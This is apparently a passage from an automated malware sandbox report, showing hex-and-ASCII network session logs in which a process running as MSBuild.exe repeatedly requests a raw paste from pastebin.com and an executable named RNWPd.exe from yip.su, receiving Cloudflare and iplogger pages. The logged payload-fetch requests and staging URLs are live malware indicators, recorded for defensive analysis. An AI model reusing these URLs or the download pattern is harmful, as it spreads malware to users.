65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
2024-09-16 19:23:06 UTC	1369	IN	Data Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
2024-09-16 19:23:06 UTC	158	IN	Data Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	49781	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:11 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:11 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433ac73a2f4331-EWR
2024-09-16 19:23:11 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:11 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:11 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:11 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	49782	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:12 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:12 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:23:12 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:12 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cM2cPHPHBDwIvEoaTJPVrhDbC%2Fy6hdLWhelNRkt04286SS1S%2Bh7DuqHh34ZfB2vL77IgWk9rN2lP1UpvEWgrWyK9i2fQfFEDSf7Itkqdeq9UySbqJ6fw9Fs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433acb4b174339-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:23:12 UTC	471	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:12 UTC	1369	IN	Data Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
2024-09-16 19:23:12 UTC	1369	IN	Data Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
2024-09-16 19:23:12 UTC	1369	IN	Data Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
2024-09-16 19:23:12 UTC	1369	IN	Data Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
2024-09-16 19:23:12 UTC	1369	IN	Data Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
2024-09-16 19:23:12 UTC	154	IN	Data Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	49783	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:17 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:17 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433aeb9cd44252-EWR
2024-09-16 19:23:17 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:17 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:17 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:17 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	49784	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:18 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:18 UTC	899	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.42901611328125 expires: Mon, 16 Sep 2024 19:23:18 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:18 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHOoOpXO5YMQ9cv8iIX7ahQd4Xn71sd%2F5oH5CSVvmFSfLsg9Si9u5B09xHjFJvl7DVS1CbYq%2BSxbG%2FVFIyuebKbYxRTD88cfXTk%2FuWoBDa105EQMkdHW1dQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433aefce2e41bd-EWR alt-svc: h3=":443"; ma=86400
